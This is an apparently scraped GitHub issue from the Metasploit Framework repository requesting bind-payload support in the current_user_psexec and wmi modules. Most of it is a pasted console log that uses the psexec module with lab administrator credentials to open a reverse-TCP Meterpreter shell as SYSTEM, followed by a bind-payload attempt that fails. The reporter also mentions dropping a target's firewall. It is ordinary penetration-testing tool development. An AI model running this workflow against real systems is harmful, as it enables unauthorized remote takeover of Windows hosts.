metasploit-framework
metasploit-framework copied to clipboard
Published
20 hours ago •
rapid7
rapid7
Ability to use bind payloads with wmi and current_user_psexec
trafficstars
This issue was RM8694, originally filed by by @rsmudge
I love windows/local/current_user_psexec and windows/local/wmi. I noticed though that I can't use bind payloads with these modules.
Sometimes, I'll capture an admin token or creds and need to take control of a system that can't stage to the internet. I usually use psexec_command to drop the firewall and then deliver a bind payload. It'd be nice if these modules supported this workflow.
Seems to still be an issue, nearly 10 years later:
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass test123 no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser test no The username to authenticate as
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > set USERNAME Administrator
USERNAME => Administrator
msf6 exploit(windows/smb/psexec) > set PASSWORD theAdmin123
PASSWORD => theAdmin123
msf6 exploit(windows/smb/psexec) > set DOMAIN DAFOREST
DOMAIN => DAFOREST
msf6 exploit(windows/smb/psexec) > set RHOST 192.168.153.147
RHOST => 192.168.153.147
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.153.128:4444
[*] 192.168.153.147:445 - Connecting to the server...
[*] 192.168.153.147:445 - Authenticating to 192.168.153.147:445|DAFOREST as user 'Administrator'...
[*] 192.168.153.147:445 - Selecting PowerShell target
[*] 192.168.153.147:445 - Executing the payload...
[+] 192.168.153.147:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.153.147
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.147:61411) at 2023-02-01 10:03:10 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > use exploit/windows/local/current_user_psexec
[*] Using configured payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/local/current_user_psexec) > show options
Module options (exploit/windows/local/current_user_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPNAME no Service display name (Default: random)
INTERNAL_ADDRESS no Session's internal address or hostname for the victims to grab the payload from (Default: detected)
KERBEROS false yes Authenticate via Kerberos, dont resolve hostnames
NAME no Service name on each target in RHOSTS (Default: random)
RHOSTS no Target address range or CIDR identifier
SESSION yes The session to run this module on
TECHNIQUE PSH yes Technique to use (Accepted: PSH, SMB)
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Universal
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/current_user_psexec) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/current_user_psexec) > set RHOST 192.168.153.147
RHOST => 192.168.153.147
msf6 exploit(windows/local/current_user_psexec) > set LPORT 9933
LPORT => 9933
msf6 exploit(windows/local/current_user_psexec) > run
[*] Started bind TCP handler against 192.168.153.147:9933
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/current_user_psexec) > exploit
[*] Started bind TCP handler against 192.168.153.147:9933
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/current_user_psexec) > show options
Module options (exploit/windows/local/current_user_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPNAME no Service display name (Default: random)
INTERNAL_ADDRESS no Session's internal address or hostname for the victims to grab the payload from (Default: detected)
KERBEROS false yes Authenticate via Kerberos, dont resolve hostnames
NAME no Service name on each target in RHOSTS (Default: random)
RHOSTS no Target address range or CIDR identifier
SESSION 1 yes The session to run this module on
TECHNIQUE PSH yes Technique to use (Accepted: PSH, SMB)
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 9933 yes The listen port
RHOST 192.168.153.147 no The target address
Exploit target:
Id Name
-- ----
0 Universal
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/current_user_psexec) >
Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
We've labeled this as attic and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}